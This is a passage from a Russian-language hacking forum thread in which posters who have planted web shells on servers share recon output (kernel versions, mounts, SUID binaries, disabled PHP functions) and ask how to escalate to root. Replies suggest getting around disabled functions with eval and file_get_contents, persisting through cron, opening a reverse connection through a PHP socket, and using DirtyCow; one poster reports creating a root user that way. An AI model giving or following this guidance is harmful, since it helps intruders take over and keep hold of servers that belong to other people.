-rw-r--r--. 1 root root 179202 Oct 16 2012 symvers-2.6.32-279.11.1.el6.x86_64.gz
-rw-r--r--. 1 root root 185828 Mar 12 2013 symvers-2.6.32-358.2.1.el6.x86_64.gz
-rw-r--r--. 1 root root 193760 Dec 13 2013 symvers-2.6.32-431.1.2.0.1.el6.x86_64.gz
-rwxr-xr-x. 1 root root 3987760 Oct 16 2012 vmlinuz-2.6.32-279.11.1.el6.x86_64
-rwxr-xr-x. 1 root root 4043920 Mar 12 2013 vmlinuz-2.6.32-358.2.1.el6.x86_64
-rwxr-xr-x. 1 root root 4128784 Dec 13 2013 vmlinuz-2.6.32-431.1.2.0.1.el6.x86_64

* ls -la --full-time /lib

Code:
dr-xr-xr-x. 9 root root 4096 2013-12-15 12:30:03.701829792 -0800 .
drwxr-xr-x. 24 root root 4096 2017-06-20 06:40:08.269205113 -0700 ..
lrwxrwxrwx. 1 root root 14 2013-12-15 12:30:03.698829792 -0800 cpp -> ../usr/bin/cpp
drwxr-xr-x. 42 root root 4096 2013-11-22 11:09:17.000000000 -0800 firmware
drwxr-xr-x. 6 root root 4096 2012-10-30 18:33:20.000000000 -0700 kbd
drwxr-xr-x. 2 root root 4096 2013-05-09 17:49:28.605425768 -0700 lsb
dr-xr-xr-x. 5 root root 4096 2013-12-23 02:31:35.810829793 -0800 modules
drwxr-xr-x. 2 root root 4096 2013-12-15 12:32:06.450829793 -0800 security
drwxr-xr-x. 6 root root 4096 2012-10-30 18:33:20.000000000 -0700 terminfo
drwxr-xr-x. 5 root root 4096 2013-12-23 02:31:18.871829793 -0800 udev

* cat /etc/*-release

Code:
CentOS release 6.5 (Final)
LSB_VERSION=base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)

Не пробовали dirtyc0w ?

zifus

09.08.2017, 11:21

Приветствую всех.. Есть проблема, залился на сервак, а там все конкретно урезано.

Не могу сделать бекконект, gcc не работает , perl тоже. Может у когото есть соображения.

Server software :PHP/5.2.17-pl0-gentoo Apache cURL MySQL/5.1.62

User info :uid=81(apache) gid=445(usergrp)

Disable functions : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, system, popen, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority

SooLFaa

10.08.2017, 14:10

zifus said:
↑ (https://antichat.live/posts/4115056/)
Приветствую всех.. Есть проблема, залился на сервак, а там все конкретно урезано.
Не могу сделать бекконект, gcc не работает , perl тоже. Может у когото есть соображения.
Server software :
PHP
/5.2.17-pl0-gentoo Apache
cURL
MySQL
/5.1.62
User info :uid=81(apache) gid=445(usergrp)
Disable functions : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, system, popen, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority

Средствами php, можно творить многие вещи. Например читать файл не через system('cat flag') а file_get_contents('flag.txt'). Получить листинг так через другие функции. а в списках запрещенных функций я не вижу eval и call_user_func. С помощью PHP ты можешь записать переменную окружения, посмотреть, а то и попробовать, прописаться в крон ну и так далее. А perl, gcc, могут быть просто не установлены. Посмотри питон, или лучше глянь папку /usr/bin, /bin, /usr/sbin и т.п. Какие интерпретаторы/компиляторы стоят теми и пробуй прокинуть reverse connect. В конечном итоге через php можно открыть сокет....

t0ma5

10.08.2017, 15:05

zifus

11.08.2017, 12:07

Подскажите есть что-то под этого зверя...

.SpoilerTarget" type="button">Spoiler: Linux http5 3.2.83
apache@http5 / $ uname -a

Linux http5 3.2.83 #1 SMP Sat Oct 22 11:27:37 CEST 2016 x86_64 Intel(R) Xeon(R) CPU E5320 @ 1.86GHz GenuineIntel GNU/Linux

apache@http5 / $ ls -la /boot

total 16392

drwxr-xr-x 4 root root 1024 Oct 22 2016 .

drwxr-xr-x 22 root root 4096 Sep 14 2012 ..

lrwxrwxrwx 1 root root 1 Nov 14 2007 boot -> .

drwxr-xr-x 2 root root 1024 Oct 22 2016 grub

-rw-r--r-- 1 root root 0 Sep 14 2012 .keep

-rw-r--r-- 1 root root 1631704 Mar 9 2008 kernel-2.6.23-gentoo-r9

-rw-r--r-- 1 root root 1685240 May 27 2008 kernel-2.6.24-gentoo-r8

-rw-r--r-- 1 root root 2001344 Jan 12 2010 kernel-2.6.31-gentoo-r6

-rw-r--r-- 1 root root 2126896 Jul 14 2010 kernel-2.6.34-gentoo-r1

-rw-r--r-- 1 root root 2127984 Oct 12 2010 kernel-2.6.34-gentoo-r11

-rw-r--r-- 1 root root 2366768 Oct 22 2016 kernel-3.2.83

-rw-r--r-- 1 root root 2369296 Aug 20 2012 kernel-3.3.8-gentoo

-rw-r--r-- 1 root root 2386912 Sep 14 2012 kernel-3.4.9-gentoo

drwx------ 2 root root 1024 Nov 14 2007 lost+found

apache@http5 / $ mount

rootfs on / type rootfs (rw)

/dev/root on / type ext3 (rw,noatime,errors=continue,barrier=1,data=writeba ck)

proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)

tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)

rc-svcdir on /lib64/rc/init.d type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1024k,mode=7 55)

sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)

udev on /dev type devtmpfs (rw,nosuid,relatime,size=10240k,nr_inodes=1021437, mode=755)

devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620)

shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime)

/dev/md0 on /boot type ext3 (rw,noatime)

/dev/md3 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)

/tmp on /var/tmp type none (rw,noexec,nosuid,nodev,bind,noatime)

10.0.0.41:/data/nfs/userhomes/userhome3 on /home type nfs (rw,nosuid,noatime,rsize=524288,wsize=524288,intr, tcp,nfsvers=3,addr=10.0.0.41)

10.0.0.41:/data/nfs/vhosts/vhosts3/vhosts.in_one on /etc/apache2/vhosts.d type nfs (ro,noatime,rsize=524288,wsize=524288,intr,tcp,nfs vers=3,addr=10.0.0.41)

10.0.0.41:/data/nfs/checkdirs/checkdir3 on /checkdir type nfs (rw,noatime,rsize=524288,wsize=524288,intr,tcp,nfs vers=3,addr=10.0.0.41)

10.0.0.41:/data/nfs/php/php3 on /etc/php/nfs type nfs (ro,noatime,rsize=524288,wsize=524288,intr,tcp,nfs vers=3,addr=10.0.0.41)

apache@http5 / $ df -h

df -h

Filesystem Size Used Avail Use% Mounted on

rootfs 37G 19G 17G 55% /

/dev/root 37G 19G 17G 55% /

tmpfs 3.9G 68K 3.9G 1% /run

rc-svcdir 1.0M 68K 956K 7% /lib64/rc/init.d

udev 10M 4.0K 10M 1% /dev

shm 3.9G 0 3.9G 0% /dev/shm

/dev/md0 99M 23M 72M 24% /boot

/dev/md3 132G 189M 126G 1% /tmp

10.0.0.41:/data/nfs/userhomes/userhome3 3.2T 2.1T 1.1T 66% /home

10.0.0.41:/data/nfs/vhosts/vhosts3/vhosts.in_one 3.2T 2.1T 1.1T 66% /etc/apache2/vhosts.d

10.0.0.41:/data/nfs/checkdirs/checkdir3 3.2T 2.1T 1.1T 66% /checkdir

10.0.0.41:/data/nfs/php/php3 3.2T 2.1T 1.1T 66% /etc/php/nfs

apache@http5 / $ cat /etc/issue

cat /etc/issue

This is \n.\O (\s \m \r) \t

apache@http5 / $ cat /etc/crontab

cat /etc/crontab

# for vixie cron

# $Header: /var/cvsroot/gentoo-x86/sys-process/vixie-cron/files/crontab-3.0.1-r4,v 1.3 2011/09/20 15:13:51 idl0r Exp $

# Global variables

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# check scripts in cron.hourly, cron.daily, cron.weekly and cron.monthly

59 * * * * root rm -f /var/spool/cron/lastrun/cron.hourly

9 3 * * * root rm -f /var/spool/cron/lastrun/cron.daily

19 4 * * 6 root rm -f /var/spool/cron/lastrun/cron.weekly

29 5 1 * * root rm -f /var/spool/cron/lastrun/cron.monthly

*/10 * * * * root test -x /usr/sbin/run-crons && /usr/sbin/run-crons

29 0,6,12,18 * * * root /root/bin/apache-restart.sh >> /root/bin/apache-restart.log 2>&1

3-58/5 * * * * root /root/bin/copy_loghost_shorewall_rules.sh > /dev/null 2>&1

apache@http5 / $ cat /proc/version

cat /proc/version

Linux version 3.2.83 (root@http5) (gcc version 4.5.4 (Gentoo 4.5.4 p1.0, pie-0.4.7) ) #1 SMP Sat Oct 22 11:27:37 CEST 2016

apache@http5 / $ cat /proc/sys/vm/mmap_min_addr

cat /proc/sys/vm/mmap_min_addr

65536

apache@http5 / $ pwd

pwd

/

apache@http5 / $ ls -la /usr/bin/staprun

ls -la /usr/bin/staprun

ls: cannot access /usr/bin/staprun: No such file or directory

apache@http5 / $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

-r-s--x--x 1 root root 102784 Sep 14 2012 /sbin/mount.nfs

-rws--x--x 1 root root 31152 Sep 14 2012 /sbin/unix_chkpwd

-rws--x--x 1 root root 39672 Sep 14 2012 /bin/ping

-rws--x--x 1 root root 60672 Sep 14 2012 /bin/umount

-rws--x--x 1 root root 82064 Sep 14 2012 /bin/mount

-rws--x--x 1 root root 42592 Sep 14 2012 /bin/passwd

-rws--x--x 1 root root 36680 Sep 14 2012 /bin/su

-rws--x--x 1 root root 259144 Sep 14 2012 /usr/lib64/misc/ssh-keysign

-rws--x--x 1 root root 10184 Sep 14 2012 /usr/lib64/misc/glibc/pt_chown

-rws--x--x 1 root root 36296 Sep 14 2012 /usr/bin/newgrp

-rws--x--x 1 root root 59520 Sep 14 2012 /usr/bin/gpasswd

-rws--x--x 1 root root 41664 Sep 14 2012 /usr/bin/chfn

-rws--x--x 1 root root 36896 Sep 14 2012 /usr/bin/chsh

-rws--x--x 1 root root 58848 Sep 14 2012 /usr/bin/chage

-rwsr-x--x 1 root root 544534 Aug 14 2011 /usr/bin/sudo

-rws--x--x 1 root root 23064 Sep 14 2012 /usr/bin/expiry

Kevin Shindel

16.08.2017, 11:43

Помогите поднять права на Win Server 2016 x64

Есть учётка юзера.

salam477

29.09.2017, 23:44

Подскажите, возможно ли повышение прав?

$ uname -a

Linux /-hiddenlink-/ 2.6.32-042stab123.3 #1 SMP Fri May 5 12:29:05 MSK 2017 x86_64 x86_64 x86_64 GNU/Linux

.SpoilerTarget" type="button">Spoiler: Информация
$ uname -a

Linux /-hiddenlink-/ 2.6.32-042stab123.3 #1 SMP Fri May 5 12:29:05 MSK 2017 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot

total 34040

dr-xr-xr-x 3 root root 4096 Dec 12 2011 .

drwxr-xr-x 24 root root 4096 Sep 5 22:07 ..

-rw-r--r-- 1 root root 171 Nov 23 2011 .vmlinuz-2.6.32-131.21.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 170 Jun 27 2011 .vmlinuz-2.6.32-71.29.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 2280032 Nov 23 2011 System.map-2.6.32-131.21.1.el6.x86_64

-rw-r--r-- 1 root root 2228188 Jun 27 2011 System.map-2.6.32-71.29.1.el6.x86_64

-rw-r--r-- 1 root root 100203 Nov 23 2011 config-2.6.32-131.21.1.el6.x86_64

-rw-r--r-- 1 root root 97911 Jun 27 2011 config-2.6.32-71.29.1.el6.x86_64

drwxr-xr-x 2 root root 4096 Aug 29 2011 grub

-rw-r--r-- 1 root root 11547111 Dec 12 2011 initramfs-2.6.32-131.21.1.el6.x86_64.img

-rw-r--r-- 1 root root 10562525 Sep 13 2011 initramfs-2.6.32-71.29.1.el6.x86_64.img

-rw-r--r-- 1 root root 165881 Nov 23 2011 symvers-2.6.32-131.21.1.el6.x86_64.gz

-rw-r--r-- 1 root root 160602 Jun 27 2011 symvers-2.6.32-71.29.1.el6.x86_64.gz

-rwxr-xr-x 1 root root 3882160 Nov 23 2011 vmlinuz-2.6.32-131.21.1.el6.x86_64

-rwxr-xr-x 1 root root 3795744 Jun 27 2011 vmlinuz-2.6.32-71.29.1.el6.x86_64

$ ls -la --full-time /lib

total 6564

dr-xr-xr-x 10 root root 4096 2015-01-29 21:32:21.000000000 +0400 .

drwxr-xr-x 24 root root 4096 2017-09-05 22:07:46.541133565 +0400 ..

lrwxrwxrwx 1 root root 14 2014-07-04 10:55:52.000000000 +0400 cpp -> ../usr/bin/cpp

drwxr-xr-x 39 root root 4096 2011-12-12 12:33:25.000000000 +0400 firmware

drwxr-xr-x 3 root root 4096 2015-01-27 22:41:16.000000000 +0400 i686

drwxr-xr-x 6 root root 4096 2011-09-13 10:39:04.000000000 +0400 kbd

-rwxr-xr-x 1 root root 141144 2015-01-27 23:11:03.000000000 +0400 ld-2.12.so

lrwxrwxrwx 1 root root 10 2015-01-29 21:32:21.000000000 +0400 ld-linux.so.2 -> ld-2.12.so

-rwxr-xr-x 1 root root 7224 2015-01-27 23:11:05.000000000 +0400 libBrokenLocale-2.12.so

lrwxrwxrwx 1 root root 23 2015-01-29 21:32:21.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so

-rwxr-xr-x 1 root root 20376 2015-01-27 23:11:04.000000000 +0400 libSegFault.so

lrwxrwxrwx 1 root root 15 2014-07-04 10:55:20.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0

-rwxr-xr-x 1 root root 29788 2011-09-23 15:25:08.000000000 +0400 libacl.so.1.1.0

-rwxr-xr-x 1 root root 13416 2015-01-27 23:11:04.000000000 +0400 libanl-2.12.so

lrwxrwxrwx 1 root root 14 2015-01-29 21:32:21.000000000 +0400 libanl.so.1 -> libanl-2.12.so

lrwxrwxrwx 1 root root 16 2014-07-04 10:55:19.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0

-rwxr-xr-x 1 root root 17904 2011-09-23 22:52:26.000000000 +0400 libattr.so.1.1.0

lrwxrwxrwx 1 root root 15 2014-07-04 10:55:20.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4

-rwxr-xr-x 1 root root 70464 2011-06-25 05:44:14.000000000 +0400 libbz2.so.1.0.4

-rwxr-xr-x 1 root root 1902892 2015-01-27 23:11:06.000000000 +0400 libc-2.12.so

lrwxrwxrwx 1 root root 12 2015-01-29 21:32:21.000000000 +0400 libc.so.6 -> libc-2.12.so

-rwxr-xr-x 1 root root 190992 2015-01-27 23:11:03.000000000 +0400 libcidn-2.12.so

lrwxrwxrwx 1 root root 15 2015-01-29 21:32:21.000000000 +0400 libcidn.so.1 -> libcidn-2.12.so

lrwxrwxrwx 1 root root 17 2014-07-04 10:55:19.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 10340 2011-07-19 15:54:50.000000000 +0400 libcom_err.so.2.1

-rwxr-xr-x 1 root root 38380 2015-01-27 23:11:04.000000000 +0400 libcrypt-2.12.so

lrwxrwxrwx 1 root root 16 2015-01-29 21:32:21.000000000 +0400 libcrypt.so.1 -> libcrypt-2.12.so

-rwxr-xr-x 1 root root 17896 2015-01-27 23:11:03.000000000 +0400 libdl-2.12.so

lrwxrwxrwx 1 root root 13 2015-01-29 21:32:21.000000000 +0400 libdl.so.2 -> libdl-2.12.so

lrwxrwxrwx 1 root root 13 2014-07-04 10:55:17.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3

-rwxr-xr-x 1 root root 23892 2011-07-19 15:54:50.000000000 +0400 libe2p.so.2.3

lrwxrwxrwx 1 root root 16 2014-07-04 10:55:20.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4

-rwxr-xr-x 1 root root 197140 2011-07-19 15:54:50.000000000 +0400 libext2fs.so.2.4

-rw-r--r-- 1 root root 478 2011-10-04 05:55:29.000000000 +0400 libfreebl3.chk

-rwxr-xr-x 1 root root 298084 2011-10-04 05:55:29.000000000 +0400 libfreebl3.so

-rwxr-xr-x 1 root root 120672 2011-12-06 19:16:03.000000000 +0400 libgcc_s-4.4.6-20110824.so.1

lrwxrwxrwx 1 root root 28 2014-07-04 10:55:17.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.4.6-20110824.so.1

lrwxrwxrwx 1 root root 22 2014-07-04 10:55:17.000000000 +0400 libgio-2.0.so.0 -> libgio-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 723100 2011-07-19 03:04:26.000000000 +0400 libgio-2.0.so.0.2200.5

lrwxrwxrwx 1 root root 23 2014-07-04 10:55:19.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 953224 2011-07-19 03:04:26.000000000 +0400 libglib-2.0.so.0.2200.5

lrwxrwxrwx 1 root root 26 2014-07-04 10:55:20.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 10548 2011-07-19 03:04:26.000000000 +0400 libgmodule-2.0.so.0.2200.5

lrwxrwxrwx 1 root root 26 2014-07-04 10:55:19.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 278148 2011-07-19 03:04:26.000000000 +0400 libgobject-2.0.so.0.2200.5

lrwxrwxrwx 1 root root 26 2014-07-04 10:55:17.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 15424 2011-07-19 03:04:26.000000000 +0400 libgthread-2.0.so.0.2200.5

-rwxr-xr-x 1 root root 200024 2015-01-27 23:11:05.000000000 +0400 libm-2.12.so

lrwxrwxrwx 1 root root 12 2015-01-29 21:32:21.000000000 +0400 libm.so.6 -> libm-2.12.so

lrwxrwxrwx 1 root root 17 2014-07-04 10:55:19.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7

-rwxr-xr-x 1 root root 139980 2010-08-18 19:33:59.000000000 +0400 libncurses.so.5.7

lrwxrwxrwx 1 root root 18 2014-07-04 10:55:17.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7

-rwxr-xr-x 1 root root 195244 2010-08-18 19:33:59.000000000 +0400 libncursesw.so.5.7

-rwxr-xr-x 1 root root 113912 2015-01-27 23:11:05.000000000 +0400 libnsl-2.12.so

lrwxrwxrwx 1 root root 14 2015-01-29 21:32:21.000000000 +0400 libnsl.so.1 -> libnsl-2.12.so

-rwxr-xr-x 1 root root 40200 2015-01-27 23:11:04.000000000 +0400 libnss_compat-2.12.so

lrwxrwxrwx 1 root root 21 2015-01-29 21:32:21.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.12.so

-rwxr-xr-x 1 root root 25596 2015-01-27 23:11:05.000000000 +0400 libnss_dns-2.12.so

lrwxrwxrwx 1 root root 18 2015-01-29 21:32:21.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.12.so

-rwxr-xr-x 1 root root 58708 2015-01-27 23:11:04.000000000 +0400 libnss_files-2.12.so

lrwxrwxrwx 1 root root 20 2015-01-29 21:32:21.000000000 +0400 libnss_files.so.2 -> libnss_files-2.12.so

-rwxr-xr-x 1 root root 22140 2015-01-27 23:11:03.000000000 +0400 libnss_hesiod-2.12.so

lrwxrwxrwx 1 root root 21 2015-01-29 21:32:21.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so

-rwxr-xr-x 1 root root 49712 2015-01-27 23:11:04.000000000 +0400 libnss_nis-2.12.so

lrwxrwxrwx 1 root root 18 2015-01-29 21:32:21.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.12.so

-rwxr-xr-x 1 root root 58712 2015-01-27 23:11:03.000000000 +0400 libnss_nisplus-2.12.so

lrwxrwxrwx 1 root root 22 2015-01-29 21:32:21.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so

-rwxr-xr-x 1 root root 131220 2015-01-27 23:11:05.000000000 +0400 libpthread-2.12.so

lrwxrwxrwx 1 root root 18 2015-01-29 21:32:21.000000000 +0400 libpthread.so.0 -> libpthread-2.12.so

-rwxr-xr-x 1 root root 103388 2015-01-27 23:11:04.000000000 +0400 libresolv-2.12.so

lrwxrwxrwx 1 root root 17 2015-01-29 21:32:21.000000000 +0400 libresolv.so.2 -> libresolv-2.12.so

-rwxr-xr-x 1 root root 39712 2015-01-27 23:11:03.000000000 +0400 librt-2.12.so

lrwxrwxrwx 1 root root 13 2015-01-29 21:32:21.000000000 +0400 librt.so.1 -> librt-2.12.so

-rwxr-xr-x 1 root root 120780 2011-07-20 03:53:36.000000000 +0400 libselinux.so.1

-rwxr-xr-x 1 root root 31620 2015-01-27 23:11:05.000000000 +0400 libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2015-01-29 21:32:21.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so

lrwxrwxrwx 1 root root 15 2014-07-04 10:55:17.000000000 +0400 libtinfo.so.5 -> libtinfo.so.5.7

-rwxr-xr-x 1 root root 98120 2010-08-18 19:33:59.000000000 +0400 libtinfo.so.5.7

-rwxr-xr-x 1 root root 12792 2015-01-27 23:11:03.000000000 +0400 libutil-2.12.so

lrwxrwxrwx 1 root root 15 2015-01-29 21:32:21.000000000 +0400 libutil.so.1 -> libutil-2.12.so

lrwxrwxrwx 1 root root 13 2014-07-04 10:55:20.000000000 +0400 libz.so.1 -> libz.so.1.2.3

-rwxr-xr-x 1 root root 75384 2013-02-22 03:01:21.000000000 +0400 libz.so.1.2.3

dr-xr-xr-x 15 root root 4096 2017-09-05 22:07:45.248133567 +0400 modules

drwxr-xr-x 3 root root 4096 2015-01-29 21:32:21.000000000 +0400 rtkaio

drwxr-xr-x 2 root root 4096 2011-07-20 04:23:00.000000000 +0400 security

drwxr-xr-x 6 root root 4096 2011-08-29 15:45:21.000000000 +0400 terminfo

drwxr-xr-x 5 root root 4096 2011-12-12 12:33:20.000000000 +0400 udev

$ mount

/dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)

proc on /proc type proc (rw,relatime)

sysfs on /sys type sysfs (rw,relatime)

none on /dev type devtmpfs (rw,relatime,mode=755)

none on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/simfs 120G 28G 93G 23% /

none 2.0G 4.0K 2.0G 1% /dev

$ cat /etc/issue

CentOS release 6.1 (Final)

Kernel \r on an \m

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * user-name command to be executed

$ cat /proc/version

Linux version 2.6.32-042stab123.3 (root@kbuild-rh6-x64.eng.sw.ru (mailto:root@kbuild-rh6-x64.eng.sw.ru)) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Fri May 5 12:29:05 MSK 2017

$ cat /proc/sys/vm/mmap_min_addr

4096

$ pwd

/var/www/-hiddenlink-/data/www/-hiddenlink-

$ ls -la /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

-r-sr-xr-x 1 root root 53992 Aug 1 2013 /usr/local/ispmgr/cgi/download

-r-sr-xr-x 1 root root 13024 Aug 1 2013 /usr/local/ispmgr/cgi/login

-r-sr-xr-x 1 root root 38264 Aug 1 2013 /usr/local/ispmgr/cgi/xml2csv

-r-sr-xr-x 1 root root 49016 Aug 1 2013 /usr/local/ispmgr/cgi/upload

-r-sr-xr-x 1 root root 8280 Aug 1 2013 /usr/local/ispmgr/cgi/ispmgr

-r-sr-xr-x 1 root root 140408 Aug 1 2013 /usr/local/ispmgr/cgi/getuser

-r-sr-xr-x 1 root root 53248 Aug 1 2013 /usr/local/ispmgr/cgi/cronrun

-r-sr-xr-x 1 root root 53280 Aug 1 2013 /usr/local/ispmgr/cgi/mindterm

-r-sr-xr-x 1 root root 140888 Aug 1 2013 /usr/local/ispmgr/cgi/bdownload

-r-sr-xr-x 1 root root 19816 Aug 1 2013 /usr/local/ispmgr/cgi/outlook

-r-sr-xr-x 1 root root 32752 Aug 1 2013 /usr/local/ispmgr/cgi/dbdownload

-r-sr-xr-x 1 root root 57344 Aug 1 2013 /usr/local/ispmgr/cgi/certdownload

-r-sr-xr-x 1 root root 1547912 Aug 1 2013 /usr/local/ispmgr/bin/ispmgr

-r-sr-xr-x 1 root root 1146280 Aug 1 2013 /usr/local/ispmgr/sbin/pbackup

-r-sr-xr-x 1 root root 5704 Sep 29 2015 /usr/local/ispmgr/sbin/suexec

-r-sr-xr-x 1 root root 66392 Aug 1 2013 /usr/local/ispmgr/sbin/responder

-r-sr-xr-x 1 root root 36480 Aug 1 2013 /usr/local/ispmgr/sbin/vacation

-r-sr-xr-x 1 root root 1774704 Aug 1 2013 /usr/local/ispmgr/sbin/usermove

-rwsr-xr-x 1 root root 18080 Jun 25 2011 /usr/bin/pkexec

-rwsr-xr-x 1 root root 51784 Nov 23 2013 /usr/bin/crontab

-rwsr-xr-x 1 root root 59440 Jul 19 2011 /usr/bin/chage

-rws--x--x 1 root root 20056 Jul 20 2011 /usr/bin/chsh

---s--x--x 2 root root 212904 Sep 23 2011 /usr/bin/sudo

-rwsr-xr-x 1 root root 25304 Aug 22 2010 /usr/bin/passwd

-rwsr-xr-x 1 root root 64688 Jul 19 2011 /usr/bin/gpasswd

-rws--x--x 1 root root 20184 Jul 20 2011 /usr/bin/chfn

-rwsr-xr-x 1 root root 54240 Jun 25 2011 /usr/bin/at

-rwsr-xr-x 1 root root 33192 Jul 19 2011 /usr/bin/newgrp

---s--x--x 2 root root 212904 Sep 23 2011 /usr/bin/sudoedit

-rws--x--x 1 root root 14280 Jan 27 2015 /usr/libexec/pt_chown

-rws--x--x 1 vcsa root 7352 Aug 23 2010 /usr/libexec/mc/cons.saver

-rwsr-xr-x 1 root root 224912 Oct 24 2011 /usr/libexec/openssh/ssh-keysign

-rwsr-xr-x 1 root root 11080 Jun 25 2011 /usr/libexec/polkit-1/polkit-agent-helper-1

-rwsr-xr-x 1 root root 1118184 May 24 2011 /usr/sbin/exim

-rws--x--x 1 root root 33952 Aug 22 2010 /usr/sbin/userhelper

-r-s--x--- 1 root apache 13984 Apr 4 2014 /usr/sbin/suexec

-rwsr-xr-x 1 root root 9000 Dec 3 2011 /usr/sbin/usernetctl

-rwsr-xr-x 1 root root 34904 Nov 22 2011 /bin/su

-rwsr-xr-x 1 root root 36488 Jul 19 2011 /bin/ping6

-rwsr-xr-x 1 root root 76152 Jul 20 2011 /bin/mount

-rwsr-xr-x 1 root root 50272 Jul 20 2011 /bin/umount

-rwsr-xr-x 1 root root 40760 Jul 19 2011 /bin/ping

-rwsr-x--- 1 root dbus 46232 Sep 13 2012 /lib64/dbus-1/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 32160 Jul 20 2011 /sbin/unix_chkpwd

-rwsr-xr-x 1 root root 9632 Jul 20 2011 /sbin/pam_timestamp_check

passwd

25.11.2017, 08:58

Подскажите как дальше действовать?

Создал пользователя с помощью DirtyCow. Но по SSH не коннектится(даже логин не спрашивает, сразу connection timeout). Есть залитый шелл(wso).

Каким образом выполнять команды от рута? Или как сменить user:group на шелле?

.SpoilerTarget" type="button">Spoiler: Info
Linux version 2.6.18-408.el5 (mockbuild@builder17.centos.org (mailto:mockbuild@builder17.centos.org)) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Tue Jan 19 08:14:00 EST 2016

CentOS release 5.11 (Final)

Kernel \r on an \m

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate

Danger: clamd, iptables, tripwire, logwatch

Downloaders: wget, lynx, links, curl, lwp-mirror

Muracha

21.12.2017, 02:45

Апач - права доступа шелла nobody .

Есть скрипты nobody и пользователя.

При заливке шелла от nobody - будет нободи, а если от пользователя?

Или не в зависимости от этого все права будут под 0 урезаны?

dmax0fw

05.01.2018, 13:34

Muracha said:
↑ (https://antichat.live/posts/4163706/)
Есть скрипты nobody и пользователя.

не важно чьи скрипты,важно от чьего имени они исполняются

Muracha said:
↑ (https://antichat.live/posts/4163706/)
При заливке шелла от nobody - будет нободи, а если от пользователя?

если у вас есть возможность залить веб шелл от имени пользователя, то апач исполнит его от nobody,так как в конфиге апача прописано от чьего имени исполнять php

но конфиги могут быть разными для каждого сайта, тоесть в конфиге для сайта site1 может быть прописано исполнять php скрипты от user1, а в конфиге для сайта site2 - исполнять от user2

Dr_Wile

25.01.2018, 12:58

